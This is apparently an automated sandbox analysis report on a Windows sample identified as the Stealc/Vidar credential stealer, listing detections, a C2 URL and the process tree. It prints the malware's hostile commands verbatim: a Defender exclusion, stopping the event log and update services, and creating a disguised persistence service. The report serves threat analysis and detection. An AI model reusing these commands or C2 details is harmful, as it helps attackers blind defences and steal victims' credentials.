Edit tour

Windows Analysis Report
b4s45TboUL.exe

Overview

General Information

Sample name:	b4s45TboUL.exe renamed because original name is a hash value
Original sample name:	b6f6e51f0efa952f3ffcaab9dd5895db.exe
Analysis ID:	1545664
MD5:	b6f6e51f0efa952f3ffcaab9dd5895db
SHA1:	dadb11d90adb38dc798acae755004ed8e93b088f
SHA256:	7bfc486e94aacc90fac1037845f79f92f04a0db6fbbab9eaa45c4afe7d0a21fe
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies power options to not sleep / hibernate

Modifies the hosts file

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses powercfg.exe to modify the power settings

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

b4s45TboUL.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\b4s45TboUL.exe" MD5: B6F6E51F0EFA952F3FFCAAB9DD5895DB)

cmd.exe (PID: 2816 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HIIDGCGCBF.exe (PID: 2828 cmdline: "C:\ProgramData\HIIDGCGCBF.exe" MD5: 0F247FC98A73243773ED3614FFAD3118)

powershell.exe (PID: 7084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3264 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 3620 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 6320 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 2208 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2648 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2000 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1696 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1860 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 5780 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6872 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 5924 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4476 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1136 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1732 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6536 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2872 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 5592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 3052 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 792 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556 MD5: C31336C1EFC2CCB44B4326EA793040F2)

updater.exe (PID: 1740 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 0F247FC98A73243773ED3614FFAD3118)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}

Threatname: Vidar

{"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: b4s45TboUL.exe PID: 6556	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: b4s45TboUL.exe PID: 6556	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: b4s45TboUL.exe PID: 6556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: b4s45TboUL.exe PID: 6556	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.b4s45TboUL.exe.2570000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.b4s45TboUL.exe.400000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.b4s45TboUL.exe.2490e67.3.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.b4s45TboUL.exe.2570000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.b4s45TboUL.exe.400000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5780, ProcessName: powercfg.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7084, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 1732, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7084, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3052, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\HIIDGCGCBF.exe" , ParentImage: C:\ProgramData\HIIDGCGCBF.exe, ParentProcessId: 2828, ParentProcessName: HIIDGCGCBF.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6536, ProcessName: sc.exe

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:00.945251+0100	2044245	1	Malware Command and Control Activity Detected	45.91.200.39	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:00.915029+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.91.200.39	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:01.177086+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.91.200.39	80	TCP

ET MALWARE Win32/Stealc Submitting Screenshot to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:08.220875+0100	2044249	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.91.200.39	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:02.064214+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.91.200.39	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:01.184458+0100	2044247	1	Malware Command and Control Activity Detected	45.91.200.39	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:00.667787+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.91.200.39	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T19:47:02.569101+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:10.996740+0100	2803304	3	Unknown Traffic	192.168.2.4	49731	87.106.236.48	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: b4s45TboUL.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}
Source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://45.91.200.39/eaa194fa594ff9c2.php", "Botnet": "LogsDiller"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Google\Chrome\updater.exe	ReversingLabs: Detection: 47%
Source: C:\ProgramData\HIIDGCGCBF.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: b4s45TboUL.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: b4s45TboUL.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 22
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 11
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 20
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 24
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: lstrcatA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: OpenEventA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateEventA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CloseHandle
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Sleep
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: VirtualFree
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: lstrlenA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ExitProcess
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: user32.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateDCA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sscanf
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HAL9TH
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: JohnDoe
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DISPLAY
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: http://45.91.200.39
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: gjtwvm
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: /eaa194fa594ff9c2.php
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: /cb9cc10e175e1537/
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: LogsDiller
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GlobalLock
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HeapFree
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetFileSize
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GlobalSize
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Process32Next
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetWindowsDirectoryA
